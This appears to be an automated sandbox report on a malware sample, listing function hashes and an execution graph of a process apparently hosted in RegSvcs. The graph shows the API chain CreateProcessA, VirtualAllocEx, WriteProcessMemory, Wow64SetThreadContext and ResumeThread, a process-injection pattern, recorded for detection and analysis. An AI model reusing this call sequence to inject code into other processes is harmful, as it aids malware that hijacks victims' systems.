                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b8a61812854b9e689987827bea94f76850d5f99049d5922715561eb73abf99a
                                                            • Instruction ID: c5e61f87ed650821315e7a7590e760fe35d770c43f6b6a50ad6ee8faa81ae4c6
                                                            • Opcode Fuzzy Hash: 6b8a61812854b9e689987827bea94f76850d5f99049d5922715561eb73abf99a
                                                            • Instruction Fuzzy Hash: AF21F234700205CFDB18DF69C598AAE77F5BB89305B1044A8E60AEB3A4EB359D018B91
                                                            Function 015F9F81 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 382370e59da61021f737b2bca0c22bd7b34b4afb68deb828e55392acc2b76247
                                                            • Instruction ID: b198e67e4354ba713abb997cd9807f3659b2875151e3a97040d7310fe8bbff23
                                                            • Opcode Fuzzy Hash: 382370e59da61021f737b2bca0c22bd7b34b4afb68deb828e55392acc2b76247
                                                            • Instruction Fuzzy Hash: 10219231E002169BCB19DF65D440ADEF7B6BF89310F10861EE915FB340DB71A846CB51
                                                            Function 015F186A Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e4602b6c4cb9729bf4147cbb93774c09533178952752ff103002b647b23138a0
                                                            • Instruction ID: 259ebbdf7c3d64c6865927a2af1273c964383551cf3dee2420b88103866ec435
                                                            • Opcode Fuzzy Hash: e4602b6c4cb9729bf4147cbb93774c09533178952752ff103002b647b23138a0
                                                            • Instruction Fuzzy Hash: 5F212A30B00609CFDB64DBB9C6946AE7BF6BF49241F10046DD606EF250EB369D42CBA1
                                                            Function 015F1878 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b50e0c18f55061474b0833f54171f207d1d7a1c594ceb50a2a6a15b32755cef8
                                                            • Instruction ID: f11a62d4d9000e598c4ef2eb54f6a568462d90b8fa2e9d15abd341b5acad5ec4
                                                            • Opcode Fuzzy Hash: b50e0c18f55061474b0833f54171f207d1d7a1c594ceb50a2a6a15b32755cef8
                                                            • Instruction Fuzzy Hash: F521FA30B00609CFDB64DBB9C6A56AE7BF6BB89241F10046DD606EF350DB369D41CBA1
                                                            Function 015F9F90 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7864dfe22facf4d985280d49d70706c599422c7a593e84e6917cdd271c5686fb
                                                            • Instruction ID: 8e91c0df82cc9e59287e6847034d822f5914f43654b6c006a93babb6560179dc
                                                            • Opcode Fuzzy Hash: 7864dfe22facf4d985280d49d70706c599422c7a593e84e6917cdd271c5686fb
                                                            • Instruction Fuzzy Hash: FA219230E002169BCB19CFA9D440ADEB7B6BF89300F10861EF916FB340DB71A845CB51
                                                            Function 015F16A0 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 387b1c4e05b90033b175d3c4d8072be1f128012550e0977e95245623ac84ab1a
                                                            • Instruction ID: 66fba8a48e3d942fc821bf90f4cfa46b4c3991128290eeba82bb17c76cd689a7
                                                            • Opcode Fuzzy Hash: 387b1c4e05b90033b175d3c4d8072be1f128012550e0977e95245623ac84ab1a
                                                            • Instruction Fuzzy Hash: 0E21C030600506CBEF25E72DE8C4B5D3B26F784314F10192DE61ACB252DA78DCC5CB91
                                                            Function 015F4F88 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 107ad86d898e54c9a45aeff19f4185fa236a5b0b14334e79c2cf2ffe50c9f571
                                                            • Instruction ID: 09309d9eaec3bee1eee23d7aae3952ebb885a974a4592e23c6b32ad49b5a2e04
                                                            • Opcode Fuzzy Hash: 107ad86d898e54c9a45aeff19f4185fa236a5b0b14334e79c2cf2ffe50c9f571
                                                            • Instruction Fuzzy Hash: CC21E534710205CFDB58DB79C598AAE77F6FB89305F1044A8E606EB3A4EB359D01CB51
                                                            Function 015F1478 Relevance: .1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 416be37df6b0b4d904d4e573215d1ca756f75d2d2541de20a6d0bfa9f54cbd68
                                                            • Instruction ID: 072c9120eedb60ce0e6d3ba18bb6be7d7cce88396eac090b341a2c30a2543e6f
                                                            • Opcode Fuzzy Hash: 416be37df6b0b4d904d4e573215d1ca756f75d2d2541de20a6d0bfa9f54cbd68
                                                            • Instruction Fuzzy Hash: 0B11B172E00656CBCF11AFB888841AEBBF5FF96214F1804BED645EF242E631D8418B91
                                                            Function 015F17B2 Relevance: .1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95143dff86f3932d8b3e5545a19491b4fc7fc8ce569563d7ed39d316fb02f972
                                                            • Instruction ID: 57c19d3143d53cbabdc6937d034b05eaaeaa0aff8f421d3b1a4d96787238f445
                                                            • Opcode Fuzzy Hash: 95143dff86f3932d8b3e5545a19491b4fc7fc8ce569563d7ed39d316fb02f972
                                                            • Instruction Fuzzy Hash: FB113B76F00240DFCF11AB7498842AE7BF5FF4D250F144569E90ADB305EB348942C791
                                                            Function 015F0838 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8890fe0920b94979b2b97e623472dfe409b441be65483ae853976d4e90d93db
                                                            • Instruction ID: cbbe07ac691bdd564ab7a91bdafb1033a06e38a3525e83c118118c4c12a37f99
                                                            • Opcode Fuzzy Hash: a8890fe0920b94979b2b97e623472dfe409b441be65483ae853976d4e90d93db
                                                            • Instruction Fuzzy Hash: FD11B230A042099BEF265A79C54036E3763FB46224F28486DE652CF2C3DA25CC818BD1
                                                            Function 015F0848 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b4fe3f71c1595d26a8c079845f9b20e1b4de6b7723f5b74a7286e3f64db3c38
                                                            • Instruction ID: 4ce3f45c13993df89f2f125f0580dd681b6b80be0c49e9655916ed6fd157054d
                                                            • Opcode Fuzzy Hash: 8b4fe3f71c1595d26a8c079845f9b20e1b4de6b7723f5b74a7286e3f64db3c38
                                                            • Instruction Fuzzy Hash: 40114F30B002099BEF156A7EC54476E36A3FB85625F28483DF616CF2C7DA65CC818BD1
                                                            Function 015F6B99 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3888ffe3d8359193bcf5da62df3e4b6354054bf47ace634cc5e6d06fcc023da2
                                                            • Instruction ID: 78796c2cc966e05483ce58cda1094aa1f191de9853197f6a579aa6386bd2a82d
                                                            • Opcode Fuzzy Hash: 3888ffe3d8359193bcf5da62df3e4b6354054bf47ace634cc5e6d06fcc023da2
                                                            • Instruction Fuzzy Hash: 7311E131605295AFCB16AB7CD4642BE3FB2EFCA300B1048EAD586CB396DA355C45C792
                                                            Function 015F1488 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb53e6ca8645cc70e7fbc4965d446de55eb90292bd2e9eafe0acf1f4cfd7fff2
                                                            • Instruction ID: 875c52348f5158c011af0c4c27db57c8c589867a61b2f49d5040c04efad656cf
                                                            • Opcode Fuzzy Hash: eb53e6ca8645cc70e7fbc4965d446de55eb90292bd2e9eafe0acf1f4cfd7fff2
                                                            • Instruction Fuzzy Hash: E6012D31A00616CBCB21EFB888941AE7BE5FF98214F25047EDA05EB241E631D9418B91
                                                            Function 015FA6C0 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dad05581bae8ee12d2acaee9dc5a44b4d8100e4e579638d34572be321b68aa62
                                                            • Instruction ID: 689fd0d1822ee3a4d64c92034d2dcb970f78c329b69d7bbc2d2f05f7927653fa
                                                            • Opcode Fuzzy Hash: dad05581bae8ee12d2acaee9dc5a44b4d8100e4e579638d34572be321b68aa62
                                                            • Instruction Fuzzy Hash: 0B01D630A001058BDB14EF69D844B9ABB76FFC4310F548168C94C5F29AEBB0AD46C7E1
                                                            Function 015F8F20 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ee00df30e549af4e20a7aa6f43809d31908045d084c9ecb370659522b68f2f4
                                                            • Instruction ID: 2f38c0a2879515906a6cd6890b6a5af1b5faab33f896ac304ce051b89c410c06
                                                            • Opcode Fuzzy Hash: 4ee00df30e549af4e20a7aa6f43809d31908045d084c9ecb370659522b68f2f4
                                                            • Instruction Fuzzy Hash: 66018F3090124AEFDB05EBB8F85159D7BB5FB84300F109AACC5029B251EE346E4597A2
                                                            Function 015F7EA8 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fd045964dd5818b7c5e9127485ed815d266bc3fc97d9358bfe282f92fb7aef7
                                                            • Instruction ID: a5fa2acfb1dc154c298b98c1b0025aebeb054fad555de19463fa44c07431bef1
                                                            • Opcode Fuzzy Hash: 6fd045964dd5818b7c5e9127485ed815d266bc3fc97d9358bfe282f92fb7aef7
                                                            • Instruction Fuzzy Hash: D301D675B402088FDB18EB74D558B6C77B2FB8C215F5504A8E5068B2A4CB35AD86CB51
                                                            Function 015F8F30 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe830ade904e8ff4fede39e0647a414848913ba1af7df3fd4f6adc758b8d1efe
                                                            • Instruction ID: 62cc8fded6c8cbd3a4d5d5e0032a042ec7becf3504fd3eac2a3fddc70eb3b940
                                                            • Opcode Fuzzy Hash: fe830ade904e8ff4fede39e0647a414848913ba1af7df3fd4f6adc758b8d1efe
                                                            • Instruction Fuzzy Hash: 66F08C3090014EDFDB05EBB8F84158C7BB1FB84300F10966CC505AB250EE742E459B91

                                                            Execution Graph

                                                            Execution Coverage:10.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:227
                                                            Total number of Limit Nodes:12
                                                            execution_graph 28903 2cc4668 28904 2cc467a 28903->28904 28905 2cc4686 28904->28905 28909 2cc4778 28904->28909 28914 2cc3e40 28905->28914 28907 2cc46a5 28910 2cc479d 28909->28910 28918 2cc4888 28910->28918 28922 2cc4879 28910->28922 28915 2cc3e4b 28914->28915 28930 2cc5e4c 28915->28930 28917 2cc706f 28917->28907 28919 2cc48af 28918->28919 28920 2cc498c 28919->28920 28926 2cc44c4 28919->28926 28923 2cc48af 28922->28923 28924 2cc498c 28923->28924 28925 2cc44c4 CreateActCtxA 28923->28925 28925->28924 28927 2cc5918 CreateActCtxA 28926->28927 28929 2cc59cf 28927->28929 28931 2cc5e57 28930->28931 28934 2cc5e6c 28931->28934 28933 2cc751d 28933->28917 28935 2cc5e77 28934->28935 28938 2cc70a4 28935->28938 28937 2cc75fa 28937->28933 28939 2cc70af 28938->28939 28942 2cc70d4 28939->28942 28941 2cc76ed 28941->28937 28943 2cc70df 28942->28943 28945 2cc8953 28943->28945 28949 2ccb001 28943->28949 28944 2cc8991 28944->28941 28945->28944 28953 2ccd0f8 28945->28953 28958 2ccd0e8 28945->28958 28964 2ccb038 28949->28964 28967 2ccb027 28949->28967 28950 2ccb016 28950->28945 28955 2ccd119 28953->28955 28954 2ccd13d 28954->28944 28955->28954 28976 2ccd2a8 28955->28976 28980 2ccd297 28955->28980 28959 2ccd06b 28958->28959 28960 2ccd0f2 28958->28960 28959->28944 28961 2ccd13d 28960->28961 28962 2ccd2a8 GetModuleHandleW 28960->28962 28963 2ccd297 GetModuleHandleW 28960->28963 28961->28944 28962->28961 28963->28961 28971 2ccb130 28964->28971 28965 2ccb047 28965->28950 28968 2ccb038 28967->28968 28970 2ccb130 GetModuleHandleW 28968->28970 28969 2ccb047 28969->28950 28970->28969 28972 2ccb164 28971->28972 28973 2ccb141 28971->28973 28972->28965 28973->28972 28974 2ccb368 GetModuleHandleW 28973->28974 28975 2ccb395 28974->28975 28975->28965 28977 2ccd2b5 28976->28977 28978 2ccd2ef 28977->28978 28984 2ccce10 28977->28984 28978->28954 28981 2ccd2b5 28980->28981 28982 2ccce10 GetModuleHandleW 28981->28982 28983 2ccd2ef 28981->28983 28982->28983 28983->28954 28985 2ccce1b 28984->28985 28987 2ccdc00 28985->28987 28988 2cccf3c 28985->28988 28987->28987 28989 2cccf47 28988->28989 28990 2cc70d4 GetModuleHandleW 28989->28990 28991 2ccdc6f 28990->28991 28991->28987 28699 2ccd3c0 28700 2ccd406 28699->28700 28704 2ccd590 28700->28704 28707 2ccd5a0 28700->28707 28701 2ccd4f3 28710 2ccced8 28704->28710 28708 2ccd5ce 28707->28708 28709 2ccced8 DuplicateHandle 28707->28709 28708->28701 28709->28708 28711 2ccd608 DuplicateHandle 28710->28711 28712 2ccd5ce 28711->28712 28712->28701 28723 750d24d 28724 750cfce 28723->28724 28724->28723 28725 750d05f 28724->28725 28728 750edc0 28724->28728 28747 750edb0 28724->28747 28729 750edda 28728->28729 28730 750ede2 28729->28730 28766 750f925 28729->28766 28771 750f460 28729->28771 28775 750f3de 28729->28775 28783 750f6fa 28729->28783 28788 750f839 28729->28788 28792 750f5b8 28729->28792 28796 750f8ae 28729->28796 28800 750f50c 28729->28800 28805 750f2aa 28729->28805 28810 750f429 28729->28810 28814 750f3e9 28729->28814 28821 750fc29 28729->28821 28826 750f149 28729->28826 28831 750f308 28729->28831 28836 750f288 28729->28836 28841 750f3a5 28729->28841 28730->28725 28748 750edc0 28747->28748 28749 750f5b8 2 API calls 28748->28749 28750 750f839 2 API calls 28748->28750 28751 750f6fa 2 API calls 28748->28751 28752 750f3de 4 API calls 28748->28752 28753 750f460 2 API calls 28748->28753 28754 750f925 2 API calls 28748->28754 28755 750f3a5 2 API calls 28748->28755 28756 750ede2 28748->28756 28757 750f288 2 API calls 28748->28757 28758 750f308 2 API calls 28748->28758 28759 750f149 2 API calls 28748->28759 28760 750fc29 2 API calls 28748->28760 28761 750f3e9 4 API calls 28748->28761 28762 750f429 2 API calls 28748->28762 28763 750f2aa 2 API calls 28748->28763 28764 750f50c 2 API calls 28748->28764 28765 750f8ae 2 API calls 28748->28765 28749->28756 28750->28756 28751->28756 28752->28756 28753->28756 28754->28756 28755->28756 28756->28725 28757->28756 28758->28756 28759->28756 28760->28756 28761->28756 28762->28756 28763->28756 28764->28756 28765->28756 28767 750f92b 28766->28767 28845 750c930 28767->28845 28849 750c928 28767->28849 28768 750fa51 28853 750c790 28771->28853 28857 750c798 28771->28857 28772 750f47a 28776 750f587 28775->28776 28861 750fef0 28776->28861 28866 750fedf 28776->28866 28777 750f5a3 28781 750c930 WriteProcessMemory 28777->28781 28782 750c928 WriteProcessMemory 28777->28782 28778 750fa51 28781->28778 28782->28778 28784 750f27e 28783->28784 28784->28783 28785 750f290 28784->28785 28786 750c790 Wow64SetThreadContext 28784->28786 28787 750c798 Wow64SetThreadContext 28784->28787 28786->28784 28787->28784 28789 750f83a 28788->28789 28879 750be71 28789->28879 28883 750be78 28789->28883 28793 750f3a4 28792->28793 28794 750be71 ResumeThread 28793->28794 28795 750be78 ResumeThread 28793->28795 28794->28793 28795->28793 28797 750f83a 28796->28797 28798 750be71 ResumeThread 28797->28798 28799 750be78 ResumeThread 28797->28799 28798->28797 28799->28797 28801 750fa70 28800->28801 28887 750ca20 28801->28887 28891 750ca1a 28801->28891 28802 750fa92 28806 750f2ba 28805->28806 28808 750c930 WriteProcessMemory 28806->28808 28809 750c928 WriteProcessMemory 28806->28809 28807 750f342 28807->28730 28808->28807 28809->28807 28811 750f436 28810->28811 28812 750be71 ResumeThread 28811->28812 28813 750be78 ResumeThread 28811->28813 28812->28811 28813->28811 28817 750c930 WriteProcessMemory 28814->28817 28818 750c928 WriteProcessMemory 28814->28818 28815 750f290 28816 750f27e 28816->28815 28819 750c790 Wow64SetThreadContext 28816->28819 28820 750c798 Wow64SetThreadContext 28816->28820 28817->28816 28818->28816 28819->28816 28820->28816 28822 750f216 28821->28822 28823 750f37e 28822->28823 28895 750cbb8 28822->28895 28899 750cbae 28822->28899 28823->28730 28827 750f18b 28826->28827 28828 750f37e 28827->28828 28829 750cbb8 CreateProcessA 28827->28829 28830 750cbae CreateProcessA 28827->28830 28828->28730 28829->28827 28830->28827 28832 750f313 28831->28832 28834 750c930 WriteProcessMemory 28832->28834 28835 750c928 WriteProcessMemory 28832->28835 28833 750f342 28833->28730 28834->28833 28835->28833 28837 750f27e 28836->28837 28838 750f290 28837->28838 28839 750c790 Wow64SetThreadContext 28837->28839 28840 750c798 Wow64SetThreadContext 28837->28840 28839->28837 28840->28837 28842 750f3bf 28841->28842 28843 750be71 ResumeThread 28842->28843 28844 750be78 ResumeThread 28842->28844 28843->28842 28844->28842 28846 750c978 WriteProcessMemory 28845->28846 28848 750c9cf 28846->28848 28848->28768 28850 750c930 WriteProcessMemory 28849->28850 28852 750c9cf 28850->28852 28852->28768 28854 750c7dd Wow64SetThreadContext 28853->28854 28856 750c825 28854->28856 28856->28772 28858 750c7dd Wow64SetThreadContext 28857->28858 28860 750c825 28858->28860 28860->28772 28862 750ff05 28861->28862 28871 750c870 28862->28871 28875 750c868 28862->28875 28863 750ff24 28863->28777 28867 750fef0 28866->28867 28869 750c870 VirtualAllocEx 28867->28869 28870 750c868 VirtualAllocEx 28867->28870 28868 750ff24 28868->28777 28869->28868 28870->28868 28872 750c8b0 VirtualAllocEx 28871->28872 28874 750c8ed 28872->28874 28874->28863 28876 750c86f VirtualAllocEx 28875->28876 28878 750c8ed 28876->28878 28878->28863 28880 750be78 ResumeThread 28879->28880 28882 750bee9 28880->28882 28882->28789 28884 750beb8 ResumeThread 28883->28884 28886 750bee9 28884->28886 28886->28789 28888 750ca6b ReadProcessMemory 28887->28888 28890 750caaf 28888->28890 28890->28802 28892 750ca20 ReadProcessMemory 28891->28892 28894 750caaf 28892->28894 28894->28802 28896 750cc0c CreateProcessA 28895->28896 28898 750ce03 28896->28898 28898->28898 28900 750cbb7 CreateProcessA 28899->28900 28902 750ce03 28900->28902 28902->28902 28713 a8f0040 28714 a8f01cb 28713->28714 28715 a8f0066 28713->28715 28715->28714 28718 a8f02ba 28715->28718 28721 a8f02c0 PostMessageW 28715->28721 28719 a8f02c0 PostMessageW 28718->28719 28720 a8f032c 28719->28720 28720->28715 28722 a8f032c 28721->28722 28722->28715 28992 750d1ef 28993 750cfce 28992->28993 28994 750d05f 28993->28994 28995 750edc0 12 API calls 28993->28995 28996 750edb0 12 API calls 28993->28996 28995->28994 28996->28994

                                                            Executed Functions

                                                            Function 0750CBAE Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 750cbae-750cbb5 1 750cbb7-750cc06 0->1 2 750cc0c-750cc4d 0->2 1->2 5 750cc86-750cca6 2->5 6 750cc4f-750cc59 2->6 13 750cca8-750ccb2 5->13 14 750ccdf-750cd0e 5->14 6->5 7 750cc5b-750cc5d 6->7 8 750cc80-750cc83 7->8 9 750cc5f-750cc69 7->9 8->5 11 750cc6b 9->11 12 750cc6d-750cc7c 9->12 11->12 12->12 15 750cc7e 12->15 13->14 16 750ccb4-750ccb6 13->16 20 750cd10-750cd1a 14->20 21 750cd47-750ce01 CreateProcessA 14->21 15->8 18 750ccb8-750ccc2 16->18 19 750ccd9-750ccdc 16->19 22 750ccc4 18->22 23 750ccc6-750ccd5 18->23 19->14 20->21 24 750cd1c-750cd1e 20->24 34 750ce03-750ce09 21->34 35 750ce0a-750ce90 21->35 22->23 23->23 25 750ccd7 23->25 26 750cd20-750cd2a 24->26 27 750cd41-750cd44 24->27 25->19 29 750cd2c 26->29 30 750cd2e-750cd3d 26->30 27->21 29->30 30->30 31 750cd3f 30->31 31->27 34->35 45 750cea0-750cea4 35->45 46 750ce92-750ce96 35->46 48 750ceb4-750ceb8 45->48 49 750cea6-750ceaa 45->49 46->45 47 750ce98 46->47 47->45 51 750cec8-750cecc 48->51 52 750ceba-750cebe 48->52 49->48 50 750ceac 49->50 50->48 54 750cede-750cee5 51->54 55 750cece-750ced4 51->55 52->51 53 750cec0 52->53 53->51 56 750cee7-750cef6 54->56 57 750cefc 54->57 55->54 56->57 59 750cefd 57->59 59->59
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750CDEE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 61c3740584763133855f0389edd5a1dae17b9bd1fc8b04c2e9636e5ccff7885a
                                                            • Instruction ID: 3f5749f4b39d116ce99d919e4f1cf345181a388d07ccb23fa4761261d7c3ab31
                                                            • Opcode Fuzzy Hash: 61c3740584763133855f0389edd5a1dae17b9bd1fc8b04c2e9636e5ccff7885a
                                                            • Instruction Fuzzy Hash: 71A161B1D00659DFEF11CF68C9417DEBBB2BF45310F14826AE819A7280DB749985CFA1
                                                            Function 0750CBB8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 60 750cbb8-750cc4d 63 750cc86-750cca6 60->63 64 750cc4f-750cc59 60->64 71 750cca8-750ccb2 63->71 72 750ccdf-750cd0e 63->72 64->63 65 750cc5b-750cc5d 64->65 66 750cc80-750cc83 65->66 67 750cc5f-750cc69 65->67 66->63 69 750cc6b 67->69 70 750cc6d-750cc7c 67->70 69->70 70->70 73 750cc7e 70->73 71->72 74 750ccb4-750ccb6 71->74 78 750cd10-750cd1a 72->78 79 750cd47-750ce01 CreateProcessA 72->79 73->66 76 750ccb8-750ccc2 74->76 77 750ccd9-750ccdc 74->77 80 750ccc4 76->80 81 750ccc6-750ccd5 76->81 77->72 78->79 82 750cd1c-750cd1e 78->82 92 750ce03-750ce09 79->92 93 750ce0a-750ce90 79->93 80->81 81->81 83 750ccd7 81->83 84 750cd20-750cd2a 82->84 85 750cd41-750cd44 82->85 83->77 87 750cd2c 84->87 88 750cd2e-750cd3d 84->88 85->79 87->88 88->88 89 750cd3f 88->89 89->85 92->93 103 750cea0-750cea4 93->103 104 750ce92-750ce96 93->104 106 750ceb4-750ceb8 103->106 107 750cea6-750ceaa 103->107 104->103 105 750ce98 104->105 105->103 109 750cec8-750cecc 106->109 110 750ceba-750cebe 106->110 107->106 108 750ceac 107->108 108->106 112 750cede-750cee5 109->112 113 750cece-750ced4 109->113 110->109 111 750cec0 110->111 111->109 114 750cee7-750cef6 112->114 115 750cefc 112->115 113->112 114->115 117 750cefd 115->117 117->117
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750CDEE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 62b8843fa530e0d9df6c0e938e1829b7d5384aadf648ff91d4687af4418cafea
                                                            • Instruction ID: ad1699df551652b3709339ab366bc31c94f24668f6ef1b95dd414904406ea09f
                                                            • Opcode Fuzzy Hash: 62b8843fa530e0d9df6c0e938e1829b7d5384aadf648ff91d4687af4418cafea
                                                            • Instruction Fuzzy Hash: 7C9161B1D00659DFDF11CF68C8417DEBBB2BF49310F14866AE819A7280DB749985CFA1
                                                            Function 02CCB130 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
